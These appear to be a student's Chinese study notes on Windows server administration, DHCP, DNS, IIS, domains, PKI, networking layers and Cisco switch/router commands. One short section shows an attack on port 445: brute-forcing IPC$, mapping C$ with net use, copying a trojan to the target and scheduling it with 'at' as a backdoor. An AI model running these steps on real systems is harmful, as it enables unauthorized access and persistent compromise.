01、批处理操作
简单的cmd指令:
1、TXT文件可以更改后缀名来实现转换(.dat/.html)
2、@echo off 关闭回显指令(即不显示如何运行)
3、>nul是屏蔽屏幕显示 2>nul是屏蔽错误提示
4、分块指令 :1
5、跳转指令 qoto 3
02、服务器
服务器系统版本介绍
Windows服务器系统:win2000 win2003 win2008 win2012
Linux服务器系统Redhat Centos
用户管理
1.1用户概述
每个用户登录系统后,拥有不同的操作权限。
每个账户有自己唯一的SID(安全标识符)
用户SID:s-1-5-21-426206823-2579496042-500
系统SID:s-1-5-21-426206823-2579496042-14852678
用户UID:500
Windows系统管理员administrator的UID是500
普通用户的UID是1000开始
不同的账户拥有不同的权限,为不同的账户赋权限,也就是为不同账户的SID赋权限!
查看sid值:whoami/user
账户密码存储位置:c\windows\sysytem32\config\SAM #暴力破解/撞库
Windows系统上,默认密码最长有效期42天
1.2内置账户
l 给人使用的账户:
Administrator #管理员账户
Guest #来宾账户
l 计算机服务组件相关的系统账号
System #系统账号==权限至高无上
Local services #本地服务账号==权限等于普通用户
Network services #网络服务账户==权限等于普通用户
1.3配置文件
每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生,路径是:win7/win2008 c:\用户\
Xp/win2003 c:\Documents and Settings\
1.4Remote Dektop Process
步骤:
1、首先将配置网络,并实现客户机与服务器可以互通
2、服务器开启允许被远程控制:桌面右键属性 远程设置 - 选择允许 确定3、客户机上:开始 - 运行 - 输入mstsc 打开远程连接工具。
4、在mstsc工具上输入服务器的IP并点击确定
5、输入服务器的账号及密码。
注意:如使用非管理员账户登录远程,需要在服务器上将用户加入到远程桌面内置组Remote Desktop users中。
查看本机开放的所有端口:netstat -a -n
03、NTFS权限
文件系统概述:文件系统即在外部存储设备上组织文件的方法
常见的文件系统:
- FAT windows
- NTFS windows
- EXT linux常见
ntfs功能:
1、 提高磁盘读写性能
2、 可靠性
加密文件系统
访问控制列表(设置权限)
3、 磁盘利用率
压缩
磁盘配额
4、支持单个文件大于4个G
04、DHCP (自动分配IP地址)
1、DHCP
Dynamic(动态的)Host(主机)configure(安装)protocol(协议规则)即自动分配IP地址
DHCP协议端口是UDP 67/68
2、DHCP优点
减少工作量、避免IP冲突、提高地址利用率
3、DHCP原理
也成为DHCP租约过程,分为4个步聚:
1)客户机发送DHCPDiscovery广播包
客户机广播请求IP地址(包含客户机的MAC地址)
2)服务器响应DHCPoffer广播包
服务器响应提供的IP地址(但无子网掩码、网关等参数)
3)客户机发送DHCPRequest广播包
客户机选择IP(也可认为确认使用哪个IP)
4)发送DHCP ACK广播包
服务器确定了租约,并提供网卡详细参数IP、掩码、网关、DNS、租期等5、DHCP续约
4、DHCP续约
当50%过后,客户机会再次发送DHCP Request包,进行续约,如服务器无响应,则继续使用并在87.5%再次DHCP Request包,进行续约,如仍然无响应,并释放IP地址,及重新发送DHCP Discovery广播包来获取IP地址当无任何服务器响应时,自动给自己分配一个169.254.xx/16属于全球统一无效地址,用于临时内网通信!
5、部署DHCP服务器
1)iP地址固定(服务器必须固定IP地址)
2)安装DHCP服务插件
3)新建作用域及作用域选项
4)激活
5)客户机验证;
ipconfig /release 释放IP
ipconfig /renew 重新获取IP
7、地址保留
这对指定的MAC地址,固定动态分配IP地址
8、选项优先级
作用域选项>服务器选项
当服务器上有多个作用域时,可以在服务器选项上设置DNS服务器
9、DHCP备份
05、DNS
1、DNS
Domain Name Service
域名服务
作用:为客户机提供域名解析服务器
2、域名组成
2.1、域名组成概述
如“www.sina.com.cn"是一个域名,从严格意义上讲"sina.com.cn"才被称为域名(全球唯一),而“www”是主机名。
"主机名.域名”称为完全限定域名(FQDN)。一个域名下可以有多个主机,域名全球唯一,那么"主机名.域名"肯定也是全球唯一的。
以“sina.com.cn"域名为例,一般管理员在命名其主机的时候会根据其主机的功能而命名,比如网站的是www,博客的是blog,论坛的是bbs,那么对应的FQDN为www.sina.com.cn,blog.sina.com.cn,bbssina.com.cn。这么多个FQDN,然而我们只需要申请一个域名即”sina.com.cn”即可。
2.2域名组成
根域
顶级域
国家顶级域 cn jp hk uk
商业顶级域
com 商业机构
edu 教育机构
org 民间组织架构
net 互联网
3、监听端口
TCP 53
UDP 53
4、DNS解析过程:
5、按照查询内容分类:
1)正向解析:已知域名,解析IP地址
2)反向解析:已知IP地址,解析域名
6、辅助DNS服务器
7、清除DNS缓存
9.1、客户机上清除缓存
ipconfig /flushdns
flushdns清空dns列表
displaydns展示dns列表
9.2、服务器上清除缓存
windows服务器:dns工具--查看--高级,调出缓存来,然后右键清除缓存
8、域名解析记录类型:
A记录:正向解析记录
CNAME记录:别名
PTR记录:反向解析记录
MX:邮件交换记录
NS:域名服务器解析
9、反向DNS
nslookup手工解析时T会进行一个反向解析
10、DNS服务器分类
主要名称服务器
辅助名称服务器
根名称服务器
高速缓存名称服务器
11、客户机域名请求解析顺序
DNS缓存----2本地hosts文件--3找本地DNS服务器
12、服务器对域名请求的处理顺序
1.DNS高速缓存-2本地区域解析文件--3转发器--4根
2.作为一个客户机,请求一个域名的顺序:缓存,host文件,请求书给服务器。服务器的处理:缓存,自己负责的区域,给服务器,根
服务器的IP地址要静态地址,如果配了10.0.0.1(地址预留),从20开始,用来部署其他服务器。
客户机和本地dns服务器
1客户机与本地DNS服务器 2客户机与DNS转发器3 DNS转发器与本地DNS服务器三种递归
dns服务器下的所有客户机都可以享受到这个域名的解析,这个的dns以外的就不能
06、IIS
1.端口号:
TCP 20/21
2.FTP工作方式
主动模式
21端口:控制端口
20端口:数据端口
被动模式
21端口+随机端口作为数据传输端口
注意:
主被动模式,阐述的是数据传输过程
主被动模式选择权在客户机上!
主被动模式,所谓主或被是站在服务器的角度
3.部署FTP服务器
1)配置静态IP
2)安装IIS-ftp软件
3)使用默认站点或创建新的站点
注意:用户最终权限为FTP权限与NTFS权限取交集
建议: FTP权限全部勾选,然后具体的在NTFS里做
4.部署WEB服务器
1)配置静态IP地址
2)安装IIS-WEB插件
3)停用默认站点
4)新建网站-地址端口绑定-指定站点路径-设置权限
5)设置默认文档(设置首页)
07、域
1.Domain
2.内网环境:
1)工作组:默认模式,人人平等,不方面管理
2)域:人人不平等,集中管理,同一管理
3.域的特点:
集中/统一管理
4.域的的组成:
1)域控制器:DC (Domain Controller)
2)成员机
5.域的部署
- 安装域控制器--就生成了域环境
- 安装了活动目录--就生成了域控制器
- 活动目录: Active Directory = AD
6.活动目录
- AD
- 特点:集中管理/统一管理
7.组策略GPO
- 组策略:Group Policy =GPO
- 作用:通过组策略可以修改计算机的各种属性,如开始菜单、桌面背景、网络参数等。
- 组策略在域中,是基于OU来下发的
- 组策略在域中下发后,用户的应用顺序是:LSDOU
- 在应用过程中,如果出现冲突,后应用的生效
- 组策略的阻止继承及强制!
- 正常情况下:LSDOU顺序
08、PKI
1、PKI概述名称:
Public Key公钥基础设施Infra.
作用:通过加密技术和数字签名保证信息的安全
组成:公钥加密技术、数字证书、CA、RA
2、信息安全三要素
机密性
完整性
身份验证/操作的不可否认性
3、公钥加密技术
作用:实现对信息加密、数字签名等安全保障
加密算法:
- 对称加密算法加解密的密钥一致!
DES 3DES AES
- 非对称加密算法
*通信双方各自产生一对公私钥
*双方各自交换公钥
*公钥和私钥为瓦相加解密关系!
*公私钥不可互相逆推!
RSA DH
x+5=y(对称加密算法)
x是原数据/原文
y是密文
5是key/密钥
4证书:
证书用于保证公密的合法性
证书格式遵循X.509标准
- 数字证书包含信息:使用者的公钥值
- 使用者标识信息 (如名称和电子邮件地址)
- 有效期(证书的有效时间)
- 颁发者标识信息
- 颁发者的数字签名
数字证书由权威公正的第三方机构即CA签发
CA是权威证书颁发机构,为了公正“公钥”的合法性!
机密性:使用对方的公钥加密
身份验证/数字签名:使用自己的私钥!
08、渗透简单入门(利用445端口漏洞)
手工测试端口号开放:telnet IP地址 测试端口
1、scanport扫描445端口
2、漏洞利用之IPC$:进行暴力破解:NTscan
3、net use [\10.1.1.2\ipc$](file://10.1.1.2/ipc$) 密码 /user:用户
==========================================
net use f: [\10.1.1.2\share](file://10.1.1.2/share) 密码 /user:用户
net use f:/del
net use * /del
net use f: [\10.1.1.2\c$](file://10.1.1.2/c$) 密码 /user:用户
4、制作木马:利用光盘上的黑鸽软件(远程管理)
5、植入木马(留后门)
copy d:\heihei.exe [\10.1.1.2\c$](file://10.1.1.2/c$)
6、设置计划任务自动执行木马:
net time [\10.1.1.2](file://10.1.1.2)
at [\10.1.1.2](file://10.1.1.2) 11:11”c:\heihei.exe”
7、等待肉鸡上线
09、OSI与TCP-IP5层协议
TCP/IP 5层协议簇/协议栈(同层使用相同的协议,下层为上层提供服务)
应用层 传输层 网络层 数据链路层 物理层
数据的封装与解封装过程
1、应用层(数据/PDU)
设备:PC/防火墙
协议:HTTP/80 HTTPS/443 SSH/22 DNS/53 Telnet/23 DHCP/67/68 FT20/21 SMTP/25 POP3/110 RDP/3389 SMB/445 Mysql/3306
包含应用层、表示层、会话层
表示层功能:实现与应用层数据之间的二进制转换
会话层功能:
端口号是由应用层协议(ftp、http、dhcp...)生成的
2、传输层(数据段/段)
设备:防火墙
协议:TCP / UDP
传输层功能:完成进程与进程之间的通讯(通过上层即应用层的端口号来完成通讯).
TCP(面向连接服务)提供可靠的数据传输,可以保证数据一定到达对方(TCP会与对方建立连接,这个连接中有数据重传机制)。
UDP(无连接服务)不可靠,没有重传机制。
TCP考虑的是安全性,UDP考虑的是性能
3、网络层(报文/包/IP包)
设备:路由器
协议:ICMP IP ARP
把原IP地址和目标IP地址写进IP包头
网络层功能:实现点对点之间的通讯
4、数据链路层(帧)
设备:交换机/网卡
协议:MAC子层协议+
网卡功能:添加MAC本地地址和目标地址,及FCS(frame check sequence)
帧格式: 有线802.3,无线802.11
MAC地址:也叫物理地址,全球唯一(查看方法:cmd ipconfig /all),长度:48位,6字节
FCS帧校验序列(利用循环校验算法),长度:4字节
类型字段的作用:识别上层协议,为上层提供服务
类型:
0x0800:上层为IP协议
0x0806:上层为ARP协议
电脑中的网卡只识别数字信号
5、物理层(比特bit)
设备:网线/光纤/空气
8bit = 1Byte字节 运营商100Mb/s
8bit=1Byte
1024B=1KB
1024KB=1MB
1024MB=1GB
1024GB=1TB
1024TB=1PB
信号:(模拟信号、数字信号)=电信号
光纤类型:1)单模光纤 2)多模光纤
网线/双绞线:5类网线、超5类网线、6类、7类
T568A :白绿、绿、白橙 、蓝、白蓝、橙、白棕、棕
T568B :白橙、橙、白绿、蓝、白蓝、绿、白棕、棕
网线的用途分类:
1.交叉线:一端为A,一端为B。同种设备间使用!
2.直通线:两端都是A或都是B。异种设备间使用!
3.全反线:一端为A,另一端为反A,也称onsole线
6、交换机
交换机的工作原理:
收到一个数据帧后:
1.首先通过学习帧中源MAC地址生成MAC地址表
2.然后检查帧中的目标MAC地址,并匹配MAC地址表:
如表中有匹配项,则单播转发;
如表中无匹配项,则除接受端口外广播转发;
3.MAC地址表的老化时间默认是300秒(可修改)
交换机的端口号:
E:10Mb F:100Mb G:1000Mb Te:10000Mb
F0/1 0是模块号 1是接口号
接口速率自适应:1000/100/10M自适应
速率工作模式可以为10,100,1000任何一种状态
端口状态:up/down
down的三种状态:
-
人工down掉
-
速率不匹配
-
双工模式不匹配(双工duplex)
双工模式:单工(只能接收不能发送,早期BB机),半双工(不能同时接收和发送),全双工(可以同时接收和发送,手机聊天)
交换机基本工作模式及命令:
第一次配置网络设备,需要使用console线,在PC需要使用“超级终端”或其他软件。
1)用户模式:
switch>
可以查看交换机的基本简单信息,且不能做任何操作修改配置!
2)特权模式:
switch> enable
switch#
可以查看所有配置,且不能修改配置,但可以做测试、保存、初始化等操作。
3)全局配置模式:
switch# configure terminal
switch(config)#
默认不能查看配置!可以修改配置,且全局生效!
4)接口配置模式:
switch(config)# interface f0/1
switch(config-if)#
默认不能查看配置!可以修改配置,且对该端口生效
5)console口/线/控制台模式
默认不能查看配置!可以修改配置,且对console口生效!
交换机命令:
exit退出一级
end直接退到特权模式
3.配置主机名:
conf t
hostname 设备名
4.设置用户密码:
line co 0
password 密码
login
exit
5.tab补全键
快捷键:
ctrl+u:快捷删除光标所有字符
ctrl+a:快速定位光标到标首
ctrl+e:快速定位光标行尾
6)在内存中存在一个文件:running-config
第一次开机,系统会在内存中自动创建一个新的干净的running-config
7)保存配置:
en
copy running-config startup-config
或write
8)交换机开机动作:
先去硬盘中查找startup-config是否存在;
如果不存在,在内存中创建新的running-config;
如果存在,则复制到内存中并改名running-config。
9)查看running-config配置
en
show running-config(sh run)
10)查看startup-config配置
show startup-config
11)重启设备:
en
reload
12)配置特权密码:
conf t
enable password 密码
enable secret 密码
password在running-config中以明文存在
secret在running-config中以密文存在
13)查看MAC地址表:
show mac-address-table
14)查看接口状态列表:
show ip intface brief
sh ip int b
15)手工开启接口:
int f0/x
no shutdown
exit
16)do的用法:其他模式加do空格可以强制使用特权模式下的命令
do sh run
do sh int b
do wr
17)删除配置
1.在哪配置的,就在哪删!
2.命令前加no空格
3.原命令中有参数,并且参数具有唯一性,则删除时不需要参数
conf t
hostname sw1
conf t
no homenane
18)清空/擦除/初始化配置
en
erase startup-config
7、路由器
1.为3层端口配置IP:
int f0/0
ip add 10.1.1.254 255.255.255.0
no shut
exit
2.开启远程控制:
conf t
transport input telnet/ssh/none/all
password 密码
login
exit
conf t
hostname r1
ip domain-name r1.qf.com
crypto key generate rsa(生成秘钥对!)
line vty 0 4(开启虚拟终端)
transport input telnet/ssh/none/all
logiin local
exit
username xx password 123.com
RSA:非对称加密算法(公钥+私钥)
交换机不能隔离网段,路由器用来隔离不同网段
为交换机配网关,通过PC管理员远程管理
3.为交换机配置管理IP:
conf t
int vlan 1
ip add 10.1.1.253 255.255.255.0
no shut
4.为交换机配置默认网关:
目的:可被跨网段管理!
conf t
ip default-gateway 10.1.1254
5.关闭自动解析功能:
cinf t
no ip domain-lookup